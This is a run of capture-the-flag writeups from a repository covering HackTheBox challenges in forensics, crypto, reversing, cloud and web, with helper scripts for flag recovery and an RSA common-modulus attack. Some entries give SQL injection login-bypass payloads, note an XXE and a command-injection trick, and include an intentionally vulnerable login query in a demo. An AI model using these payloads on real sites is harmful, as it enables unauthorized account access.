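    joined = "".join(parts[k] for k in sorted(parts)) + "".join(tail)
    m = re.search(flag_re, joined)
    return m.group(0) if m else None


def recover_flag_from_script(script):
    return reassemble_flag([decoded for _, decoded in find_encoded_strings(script)])


def base64_search_patterns(needle):
    """The base64 substrings `needle` produces at each of the three byte alignments.

    Only characters fully determined by `needle` are kept; the characters at
    either end also depend on the neighbouring bytes."""
    patterns = []
    for offset in range(3):
        enc = base64.b64encode(b"\x00" * offset + needle).decode()
        start = -(-8 * offset // 6)            # first char lying entirely inside needle
        end = 8 * (offset + len(needle)) // 6  # one past the last such char
        patterns.append(enc[start:end])
    return patterns


if __name__ == "__main__":
    print(recover_flag_from_script(SAMPLE_SCRIPT))
    print(base64_search_patterns(b"HTB{"))
```

The length check and `validate=True` drop the path, and the printable filter drops the binary blob; the three real fragments survive and reassemble to the flag this writeup reaches by hand.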
10 | 11 | Part 1 on line 761: 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f8f56c8a-8189-4fe8-97f0-a50aecda4557) 13 | 14 | ```bash 15 | echo cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d 16 | ``` 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c7e40797-6e4d-45b4-b65e-197ede85fa78) 18 | 19 | Part 2 on line 636: 20 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/89cb1857-b054-4e7f-8037-e1f01bd97c1a) 21 | 22 | ```bash 23 | echo cGFydDI9Il90aDMxcl93NHkiCg==|base64 -d 24 | ``` 25 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5a674d08-75c2-43f3-8f4b-644e4873c0e7) 26 | 27 | Part 3 on line 701: 28 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/31449608-b23d-4a24-b52f-2cd9eab44864) 29 | 30 | ```bash 31 | echo X3QwX200cnN9Cg==|base64 -d 32 | ``` 33 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/49cb28c5-b839-45d8-8302-baf814cc55bf) 34 | 35 | HTB{m1n1ng_th31r_w4y_t0_m4rs} 36 | -------------------------------------------------------------------------------- /HTB - Business CTF 2023/README.md: -------------------------------------------------------------------------------- 1 | We were able to place 44th out of 982 teams, 19/46 solves... that's top 4.4%. 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5ec45c01-844c-4921-b690-533ff01b86f0) 4 | -------------------------------------------------------------------------------- /HTB - Business CTF 2023/Scada/Watch_Tower.md: -------------------------------------------------------------------------------- 1 | ### Challenge Description 2 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c1efa2f9-6af9-4501-9f2a-42d0c9420c5c) 3 | 4 | We get a wireshark capture for this challenge. The capture contains modbus traffic with multiple `Write Multiple Registers` functions. 
The `Reference Numbers` look to be decimal character codes: 5 | 6 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/50436850-ecd5-4d7a-8235-4a4a5ab29eea) 7 | 8 | We can use the tshark command below to carve all of them out: 9 | 10 | ```bash 11 | tshark -r tower_logs.pcapng -Y "modbus" -T fields -e modbus.reference_num|grep .|awk '{print $1}' ORS=' ' 12 | ``` 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5287e38b-1867-4bdf-b255-197ce6c38159) 14 | 15 | After converting from decimal using CyberChef, we get the flag: 16 | 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/92d9c1e2-9b1f-4662-94c4-c552e67b9b89) 18 | 19 | HTB{m0d8u5_724ff1c_15_un3nc2yp73d!@^} 20 | -------------------------------------------------------------------------------- /HTB - Business CTF 2024/Cloud/Scurried.md: -------------------------------------------------------------------------------- 1 | ### Challenge Description 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/cabf4dcd-cb39-4b2c-8226-097dfb4ac48c) 4 | 5 | ## Solution 6 | 7 | The challenge provides a simple text file with what looks to be the unique ID of an AWS IAM role (the `AROA` prefix): `AROAXYAFLIG2BLQFIIP34`. A bit of research led us to [this](https://hackingthe.cloud/aws/enumeration/enumerate_principal_arn_from_unique_id/) helpful article. 8 | 9 | From our own AWS account, we go to IAM, create a role with a custom trust policy, and set the `Principal` `AWS` value to the provided unique ID. AWS resolves a valid unique ID to the principal's full ARN when the policy is saved, which is what leaks the role's ARN even though it lives in someone else's account. 10 | 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8797cd35-86de-4bed-924f-b7273341d9bd) 12 | 13 | We can save this with whatever name we want. Then we open the role and look at the Trust Relationships.
We will see that the `arn` we need was populated: 14 | 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/defeb2e7-c1d1-4c45-a046-436a9a7e0362) 16 | 17 | `HTB{arn:aws:iam::532587168180:role/vault101}` 18 | -------------------------------------------------------------------------------- /HTB - Business CTF 2024/Forensics/Caving.md: -------------------------------------------------------------------------------- 1 | ### Challenge Description 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2f8cb80a-a44a-4979-bd76-fcaf342a008a) 4 | 5 | ## Enumeration 6 | 7 | For this challenge, we get a bunch of Windows Event Viewer logs in their standard `evtx` form. 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/18588261-df28-48e2-82ce-4ca6576f4c14) 10 | 11 | I like converting them to a human-readable format (XML), as they are easier to run `strings` and `grep` over. 12 | 13 | ```bash 14 | sudo apt install python3-evtx 15 | mkdir converted 16 | for file in ./*.evtx;do evtx_dump.py "$file" > converted/"${file%.evtx}.xml";done 17 | ``` 18 | I started by looking for PowerShell scripts being run: 19 | 20 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e97df80c-6021-41a6-8b20-5386159130fe) 21 | 22 | ## Solution 23 | 24 | I opened the Windows PowerShell Operational log, looked at the content of the `h.ps1` script, and my eyes landed on `SFRC`, which is how `HTB` base64-encodes when it starts on a 3-byte boundary (at the other two alignments it looks different, so it is worth searching for those too).
I've done a lot of challenges on HTB so I recognize it immediately: 25 | 26 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4dcefb42-0d23-4809-b94c-faf248732e69) 27 | 28 | We decode it and get the flag: 29 | 30 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/df155627-68a7-4617-8700-6d8598f93e4c) 31 | 32 | `HTB{1ntruS10n_d3t3ct3d_!!!}` 33 | 34 | -------------------------------------------------------------------------------- /HTB - Business CTF 2024/Misc/Aptitude_Test.md: -------------------------------------------------------------------------------- 1 | ### Challenge Description 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7b61cb64-b4cc-4312-8885-7b6ffb13d114) 4 | 5 | ## Solution 6 | 7 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4b78c478-9497-4322-8b39-d79133052a61) 8 | 9 | I'm not sure what was up with this challenge, but as you can see from the screenshot above, I just repeatedly answered D and it spit out the flag. Got lucky I guess but it's a very easy challenge and we have a lot more to go through so we just move along. 10 | 11 | `HTB{c0nNeCt3d_t0_mY_rOl3!_c90d1982b1e1dfe3a2498b0ad6eba90e}` 12 | -------------------------------------------------------------------------------- /HTB - Business CTF 2024/README.md: -------------------------------------------------------------------------------- 1 | We were able to place 131st out of 943 teams, 25/63 solves... that's top 13.8%. 
2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1b53d10f-b01b-40fb-bb1f-919529662517) 4 | -------------------------------------------------------------------------------- /HTB - Business CTF 2024/Web/Jailbreak.md: -------------------------------------------------------------------------------- 1 | ### Challenge Description 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c7c36016-1156-45f6-8d63-5c874ebdc24e) 4 | 5 | ## Enumeration 6 | 7 | Pretty good-looking Fallout-themed website: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/21201937-ebb7-43c9-a7fb-b700e91e316c) 9 | 10 | We seem to have an interesting endpoint that lets us submit a firmware update. 11 | 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/361bf60f-72a0-4e16-9f76-81327f00dd7f) 13 | 14 | ## Solution 15 | 16 | When making the POST request we can clearly see it is sending XML data, so that screams [XXE](https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity) from a mile away: 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/eb8b859c-0c02-42ec-bac3-16fe7d700cdf) 18 | 19 | `HTB{b1om3tric_l0cks_4nd_fl1cker1ng_l1ghts_427cf9303c8fd89feaf3582d1f41a8b9}` 20 | -------------------------------------------------------------------------------- /HTB - Cyber Santa is Coming to Town 2021/Crypto/Common Mistake.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/144765586-9e19ac74-2fff-426a-a2c5-e0e11b959543.png) 2 | 3 | Unzipped the provided file and got an encrypted.txt file 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/144765593-9421227b-65ef-4bf3-91bd-4487eb600105.png) 6 | 7 | Since both ciphertexts share the same modulus ```n``` but use two different exponents ```e``` (and so two different ```c```), this should be a Common Modulus attack, which works whenever the two exponents are coprime. The title of the challenge hints at it as well.
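The attack itself, written out as an added example rather than the script linked below; the numbers are constructed and are not the challenge's. The modulus is built from two Mersenne primes and the exponents are my own choice. The only requirement is that the two public exponents are coprime: extended Euclid then gives integers `a`, `b` with `a*e1 + b*e2 = 1`, so `c1^a * c2^b = m^(a*e1 + b*e2) = m (mod n)`. One of `a`, `b` is negative, which is why that ciphertext has to be inverted modulo `n` first. The private key is never needed.

```python
# Constructed demo parameters (not the challenge's values). Two Mersenne primes
# give a ~150-bit modulus, big enough to hold a short ASCII message as an integer.
P = (1 << 61) - 1
Q = (1 << 89) - 1
N = P * Q
E1, E2 = 65537, 19  # two public exponents sharing N; they must be coprime


def egcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    x0, x1, y0, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0


def common_modulus_attack(n, e1, c1, e2, c2):
    """Recover m from c1 = m^e1 and c2 = m^e2 (mod n) when gcd(e1, e2) == 1.

    With a*e1 + b*e2 == 1, c1^a * c2^b == m^(a*e1 + b*e2) == m (mod n).
    One of a, b is negative, so that ciphertext is inverted modulo n first."""
    g, a, b = egcd(e1, e2)
    if g != 1:
        raise ValueError("public exponents must be coprime for this attack")
    if a < 0:
        c1, a = pow(c1, -1, n), -a
    if b < 0:
        c2, b = pow(c2, -1, n), -b
    return (pow(c1, a, n) * pow(c2, b, n)) % n


def hex_to_int(h):
    """The step the writeup does by hand: hex string -> integer."""
    return int(h, 16)


def int_to_text(m):
    """Integer -> bytes -> ASCII, undoing how the message was packed."""
    return m.to_bytes((m.bit_length() + 7) // 8, "big").decode()


def demo(message=b"HTB{c0mm0n_m0d}"):
    """Encrypt a constructed message twice under N, then recover it without the private key."""
    m = int.from_bytes(message, "big")
    assert m < N, "message must be smaller than the modulus"
    c1, c2 = pow(m, E1, N), pow(m, E2, N)
    return int_to_text(common_modulus_attack(N, E1, c1, E2, c2))


if __name__ == "__main__":
    print(demo())
```

For the challenge's values, feed `hex_to_int` the `n`, `c1`, `c2` strings from encrypted.txt and pass them with the two `e` values to `common_modulus_attack`; `int_to_text` then does the decimal-to-hex-to-ASCII conversion the writeup adds to the script below.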
8 | 9 | I converted the hex strings into integers using Python. 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/144765666-0e6b1ce4-ce06-4472-b282-f94a37ece97d.png) 12 | ![image](https://user-images.githubusercontent.com/80063008/144765698-e7cdf502-ee1d-4390-99d0-c0ef8e4c7a00.png) 13 | 14 | I'm not great at scripting crypto stuff, but I did find this script. 15 | 16 | https://raw.githubusercontent.com/a0xnirudh/Exploits-and-Scripts/master/RSA%20Attacks/RSA%3A%20Common%20modulus%20attack.py 17 | 18 | After fixing the indentation issues, I pasted in n, c1, c2, e1 and e2, ran the script and got a decimal value. 19 | ![image](https://user-images.githubusercontent.com/80063008/144765747-81a0958a-b79f-4197-a6f1-7bc5f9a36aeb.png) 20 | 21 | I modified the script some more to convert the decimal value to hex and then to ASCII. 22 | 23 | ![image](https://user-images.githubusercontent.com/80063008/144765780-8e063b66-b085-475b-b452-2eae79305ea5.png) 24 | 25 | ![image](https://user-images.githubusercontent.com/80063008/144765790-a187751a-9b54-4653-8e5f-2ffe6a77df68.png) 26 | 27 | 28 | HTB{c0mm0n_m0d_4774ck_15_4n07h3r_cl4ss1c} 29 | -------------------------------------------------------------------------------- /HTB - Cyber Santa is Coming to Town 2021/Forensics/BabyAPT.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/144764166-779fd08a-95c3-4fd6-8c4d-48013b5e3bf5.png) 2 | 3 | 4 | The unzipped file presents us with a pcap file. 5 | 6 | ![image](https://user-images.githubusercontent.com/80063008/144764169-aba0b163-6ed9-4da6-88fe-cf76f1b64398.png) 7 | 8 | 9 | Opened it in Wireshark and followed the TCP streams. There is a base64-encoded string in TCP stream 30.

![image](https://user-images.githubusercontent.com/80063008/144764172-87fbac9f-ea9f-44b2-bf20-f96f655348de.png)


HTB{0k_n0w_3v3ry0n3_h4s_t0_dr0p_0ff_th3ir_l3tt3rs_4t_th3_p0st_0ff1c3_4g41n}
--------------------------------------------------------------------------------
/HTB - Cyber Santa is Coming to Town 2021/Forensics/Giveaway.md:
--------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/144764376-a577ab71-04f7-4488-95cc-42957085bdf6.png)

We were provided a .docm file and generally, the first thing I do with such files is run olevba to see what macros are hiding.

```bash
olevba christmas_giveaway.docm --deobf
```

In the output, I found this part, which to me was interesting. The link drew my eye and then I stared a bit at the obfuscated charcodes.

```vb
Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String

HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
FVpHoEqBKnhPO = Replace("christmas", "i", "1")
FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)
```

A close look reveals that the flag is broken up in pieces across these variables. I manually decoded the charcodes using CyberChef one at a time. I'm sure there are easier ways but it took me 10ish minutes so I can't complain.
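One of those easier ways, as an added example that is not part of the original writeup: a small evaluator for just the VBA string idioms this macro uses (`Chr`, `Asc`, `Replace`, `&` concatenation and integer `+`/`-`), fed the seven assignment lines quoted above (the `Dim` line is left out). Evaluating them in order and concatenating the variables rebuilds the string the macro would have built, and the flag is cut out of it.

```python
# Added example: a tiny evaluator for the VBA string-building idioms in the macro
# (Chr, Asc, Replace, "&" concatenation, integer + and -), so the flag pieces can be
# recovered without decoding each charcode by hand. Not part of the original writeup.
import re

# The obfuscated assignments quoted above (the Dim declaration is omitted).
VBA_LINES = r'''
HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
FVpHoEqBKnhPO = Replace("christmas", "i", "1")
FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)
'''

TOKEN_RE = re.compile(r'\s*(?:("(?:[^"]|"")*")|(\d+)|([A-Za-z_]\w*)|([&+\-(),]))')


def tokenize(src):
    """Split one VBA expression into (kind, value) tokens."""
    tokens, pos = [], 0
    while pos < len(src):
        m = TOKEN_RE.match(src, pos)
        if not m:
            raise ValueError(f"cannot tokenize near {src[pos:pos + 12]!r}")
        pos = m.end()
        string, number, ident, op = m.groups()
        if string is not None:
            tokens.append(("str", string[1:-1].replace('""', '"')))  # "" is an escaped quote
        elif number is not None:
            tokens.append(("num", int(number)))
        elif ident is not None:
            tokens.append(("id", ident))
        else:
            tokens.append(("op", op))
    return tokens


class VbaExpr:
    """Recursive-descent evaluator for the subset of VBA the macro uses."""

    def __init__(self, tokens, env):
        self.toks, self.pos, self.env = tokens, 0, env

    def peek(self):
        return self.toks[self.pos] if self.pos < len(self.toks) else ("eof", None)

    def take(self, kind=None, value=None):
        tok = self.peek()
        if (kind and tok[0] != kind) or (value is not None and tok[1] != value):
            raise ValueError(f"expected {kind or ''} {value or ''}, got {tok}")
        self.pos += 1
        return tok

    def expr(self):
        # expr := atom (("&" | "+" | "-") atom)*   "&" concatenates, + and - are integer arithmetic
        value = self.atom()
        while self.peek()[0] == "op" and self.peek()[1] in "&+-":
            op = self.take("op")[1]
            rhs = self.atom()
            value = str(value) + str(rhs) if op == "&" else (value + rhs if op == "+" else value - rhs)
        return value

    def atom(self):
        kind, val = self.take()
        if kind in ("str", "num"):
            return val
        if kind == "op" and val == "(":
            inner = self.expr()
            self.take("op", ")")
            return inner
        if kind == "id":
            if self.peek() == ("op", "("):          # function call
                self.take("op", "(")
                args = [self.expr()]
                while self.peek() == ("op", ","):
                    self.take("op", ",")
                    args.append(self.expr())
                self.take("op", ")")
                return self.call(val, args)
            if val in self.env:                      # reference to an earlier assignment
                return self.env[val]
            raise ValueError(f"undefined variable {val}")
        raise ValueError(f"unexpected token {(kind, val)}")

    @staticmethod
    def call(name, args):
        name = name.lower()
        if name == "chr":
            return chr(args[0])
        if name == "asc":
            return ord(args[0][0])
        if name == "replace":
            return args[0].replace(args[1], args[2])
        raise ValueError(f"unsupported function {name}")


def evaluate_vba(src):
    """Evaluate the assignments in order; returns {variable: final value}."""
    env = {}
    for line in src.strip().splitlines():
        name, _, rhs = line.partition("=")
        env[name.strip()] = VbaExpr(tokenize(rhs.strip()), env).expr()
    return env


def recover_flag(src):
    env = evaluate_vba(src)
    joined = "".join(str(v) for v in env.values())   # dict keeps first-assignment order
    start = joined.index("HTB{")
    return joined[start:joined.index("}", start) + 1]


if __name__ == "__main__":
    for name, value in evaluate_vba(VBA_LINES).items():
        print(f"{name} = {value!r}")
    print(recover_flag(VBA_LINES))
```

The point of writing an evaluator instead of pasting the macro into a VBA host is that nothing executes: the parser only understands the handful of string functions, so a `Shell` or `CreateObject` call in the same sample would raise an error instead of running.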

HTB{Th1s_1s_4_pr3s3nt_3v3ryb0dy_w4nts_f0r_chr1stm4s}
--------------------------------------------------------------------------------
/HTB - Cyber Santa is Coming to Town 2021/README.md:
--------------------------------------------------------------------------------
I participated in HackTheBox Cyber Santa is Coming to Town 2021 and ended up 212th out of 7996 teams. That's top 2.6%. It was very fun for an individual CTF.

Here are my writeups to the challenges I solved.

![image](https://user-images.githubusercontent.com/80063008/144762798-844ceb20-e037-4388-b59a-5b6df9418b2b.png)
--------------------------------------------------------------------------------
/HTB - Cyber Santa is Coming to Town 2021/Reversing/Infiltration.md:
--------------------------------------------------------------------------------

![image](https://user-images.githubusercontent.com/80063008/144765958-176f1736-eec0-484f-a542-53430820f88f.png)

We get a file called client.
```
client: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=bcb9d17215725749cf2ce0ee9ef5df3c98ba8f00, for GNU/Linux 4.4.0, stripped
```
When running it locally, it would only connect back to the port I gave it and write back to me whatever I typed, but in reverse.
![image](https://user-images.githubusercontent.com/80063008/144765980-58b87af1-9f7c-42c5-8cbe-8d24bf65e417.png)

![image](https://user-images.githubusercontent.com/80063008/144765970-8656dc45-64d3-455a-91f8-7ea1de4e0d26.png)


When running it remotely I could only get this:

![image](https://user-images.githubusercontent.com/80063008/144765974-ee1ea3e0-24be-4ba5-aca8-ca4fbfce2329.png)


Ran it with strace to see more of what it is doing and I got the flag.

![image](https://user-images.githubusercontent.com/80063008/144766006-a3260555-8570-4524-99d2-8383027e8fb6.png)


HTB{n0t_qu1t3_s0_0p4qu3}

--------------------------------------------------------------------------------
/HTB - Cyber Santa is Coming to Town 2021/Web/Toy Management.md:
--------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/144764992-42912af2-3133-430c-95b9-db02b3d64343.png)

We are greeted with a login screen.

![image](https://user-images.githubusercontent.com/80063008/144764999-e95f7520-5ba3-42ad-a14d-d076078a131a.png)


The flag is in the database, so at first I thought I would need to do some SQL injection to get the flag from the table.

![image](https://user-images.githubusercontent.com/80063008/144765001-aade9949-c45e-4149-93a8-4419d006bfdc.png)


We have credentials from the database.sql file.

![image](https://user-images.githubusercontent.com/80063008/144765015-67ff25d3-adcd-47f9-aa33-324de1622233.png)

![image](https://user-images.githubusercontent.com/80063008/144765016-eb539ba6-1d3b-46b2-8223-94cfc925779c.png)

Logged in with admin on my local instance and immediately saw the flag. Is it that easy?

![image](https://user-images.githubusercontent.com/80063008/144765019-5e3864c3-621e-4674-9a20-7ec0bba92754.png)

No, on the remote website we get an invalid password. However, it seems we have SQL injection directly on the login screen. With the standard SQL injection `' or 1=1-- -` we get logged in as manager.

We do get a JWT token, however the secret is random.
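Why `' or 1=1-- -` lands on manager while a username-targeted payload picks a specific account, as an added example that is not the challenge's backend: a login lookup that splices user input into the SQL text, next to its parameterized form, both run against a constructed in-memory SQLite table whose first row is `manager`. Drobots later on this page is the same bug with the other quote character; the parameterized version rejects both styles because the input never reaches the SQL parser as syntax.

```python
# Added example: string-built login query versus a parameterized one, against a
# constructed SQLite table. Not the challenge's code; passwords are placeholders.
import sqlite3

# Constructed rows. manager comes first so that an always-true WHERE clause
# returns it, mirroring what the writeup observed.
USERS = [("manager", "manager-placeholder-pw"), ("admin", "admin-placeholder-pw")]


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return db


def login_vulnerable(db, username, password):
    """Bug on purpose: input is spliced into the statement text, so a quote ends
    the literal early and '-- ' comments out the rest (including the password check)."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Fix: placeholders bind the values as data; quotes and comment markers are
    just characters to compare against, never SQL syntax."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run the same inputs through both lookups; returns {case: (vulnerable, fixed)}."""
    db = fresh_db()
    attempts = {
        "honest": ("admin", "wrong"),              # wrong password: both refuse
        "first_row": ("' or 1=1-- -", "anything"),  # always-true clause: first row wins
        "pick_admin": ("admin'-- -", "anything"),   # closes the literal after 'admin'
    }
    return {name: (login_vulnerable(db, u, p), login_parameterized(db, u, p))
            for name, (u, p) in attempts.items()}


if __name__ == "__main__":
    for case, (vuln, fixed) in demo().items():
        print(f"{case:10s} vulnerable={vuln!r:12} parameterized={fixed!r}")
```

The JWT observation fits the same picture: a random signing secret protects the session token, but it does not matter when the server hands out a legitimately signed token to anyone who can make the login query return a row.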

With this SQL injection, we were able to get on as admin:

```
admin'-- -
```
![image](https://user-images.githubusercontent.com/80063008/144765091-8d7e8d60-d16e-4eec-a7cd-dc3ef0f68579.png)

HTB{1nj3cti0n_1s_in3v1t4bl3}

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2022/Forensics/Puppeter.md:
--------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/169348211-d0175dde-a608-4603-8d67-7acf3c7c11b3.png)

We get a lot of files from Event Viewer and we are tasked to find the flag. We read through them, filtering for errors and warnings, and come across one that's interesting.

![image](https://user-images.githubusercontent.com/80063008/169348312-871b934c-3b7b-4a01-bcce-db0c8cbb7969.png)

Definitely looks malicious. We have two stages in the picture above. Further down in the code we can see that stage two is reversed:

![image](https://user-images.githubusercontent.com/80063008/169348491-3d4d8a30-1826-4c03-8ac9-75f06509a3d2.png)

Then there is some XOR-ing going on.

![image](https://user-images.githubusercontent.com/80063008/169348833-7ad0780a-71a9-4311-95e4-b4b9a7080f2b.png)

If we pass the 1st stage to CyberChef, decode from hex and XOR it using the value found in the code, we get half of the flag.

![image](https://user-images.githubusercontent.com/80063008/169348570-5db0f02a-efd1-4b33-9693-8b5f21016ba7.png)

We repeat the process with the 2nd stage but reverse it at the end and we get the second part of the flag.

![image](https://user-images.githubusercontent.com/80063008/169348700-83e3bc9f-d20c-4b44-a2eb-dfdb1b1a5d69.png)

HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3...}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2022/Misc/Compressor.md:
--------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/169343545-23e76ac5-87b9-4be9-aac6-2ad722f3a0e7.png)

Connect via netcat to the given IP and port and we see some functions. They use bash commands. I tried to inject with `&&` and `;` but that didn't work. Then I tried `||` and got it.

![image](https://user-images.githubusercontent.com/80063008/169343735-af2c2b5e-d90e-4e85-85bf-67bc6bc885d0.png)

![image](https://user-images.githubusercontent.com/80063008/169343852-32ad75c2-f5ff-46b0-943a-a0d45bce94d3.png)

HTB{GTFO_4nd_m4k3_th3_b35t_4rt1f4ct5}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2022/Pwn/Space-Pirate-Entrypoint.md:
--------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/169348079-ae336a5c-050e-4729-9659-852bb9fc572b.png)

I'm pretty sure this was broken at the time I did it since I just entered two letters when it requested a password and it spat out the flag. I can't complain, a flag is a flag.

![image](https://user-images.githubusercontent.com/80063008/169347861-a8c04ba4-3923-413a-81f5-f01e7a132023.png)

HTB{th3_g4t35_4r3_0p3n!}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2022/Readme.md:
--------------------------------------------------------------------------------
I got to 406th out of 7024 teams, 13/61 solves... that's top 5.7%.

![image](https://user-images.githubusercontent.com/80063008/169328250-777d8737-7bd5-4384-bb86-754cbe9b912e.png)
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2022/Reversing/Omega_One.md:
--------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/169344428-a0460c09-b243-4252-b60d-d40ba48bd167.png)

When running the app, nothing seems to happen. So we load the app in Ghidra, look for strings and can see a lot of strange names.

![image](https://user-images.githubusercontent.com/80063008/169344715-deb6e745-6ed6-4174-9c40-3b78c1f033b7.png)

Looking closely, some of these names are also in the provided output.txt file. I looked up each word one by one from the provided output.txt file and figured out that they represent specific letters, numbers and characters. We filled out the chars one by one. I'm sure there are better ways but I wasn't in a rush.

Here is an example:

![image](https://user-images.githubusercontent.com/80063008/169345005-afb7920e-2623-4dd7-a26d-83c069151ed5.png)

Eventually we get all the required characters:

![image](https://user-images.githubusercontent.com/80063008/169345371-0f8d2d63-43fe-4288-9d17-9d8f1ec68bcc.png)

HTB{l1n34r_t1m3_but_pr3tty_sl0w!}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2022/Reversing/Teleport.md:
--------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/169345518-4af0e8ad-fd30-435e-a7c7-293d2358a85f.png)

Decompiling the file in Ghidra, we can see a lot of functions on the left side. Each one seems to be associated with a character.

![image](https://user-images.githubusercontent.com/80063008/169345602-49c64bc4-d5e6-44e2-9344-ba73a0e56230.png)

I went through each one and put them in ascending order. Did this one manually as well. I'm sure there's a better way.

![image](https://user-images.githubusercontent.com/80063008/169345879-3fecfdcd-a45a-4c81-919c-7c3ad9ebefa5.png)

![image](https://user-images.githubusercontent.com/80063008/169345781-633701a3-f0cd-422b-b510-561dfa528eae.png)

HTB{h0pp1ng_thru_th3_sp4c3_t1m3_c0nt1nuum!}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2022/Reversing/Wide.md:
--------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/169344130-8686a278-254a-47ba-84b4-a3b750024290.png)

Looking for strings in Ghidra we see something interesting.

![image](https://user-images.githubusercontent.com/80063008/169344192-b79081a0-4899-466e-8e81-d70b513e8821.png)

We pass that to the app and get the flag.

![image](https://user-images.githubusercontent.com/80063008/169344241-c302a6f6-4dc1-4ed3-99a6-17b5bc4e1ac5.png)

HTB{str1ngs_4r3nt_4lw4ys_4sc11}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2022/Web/Amidst_Us.md:
--------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/169337064-9710e9b0-af8f-4605-8e8a-3ca6ce1c3b7e.png)

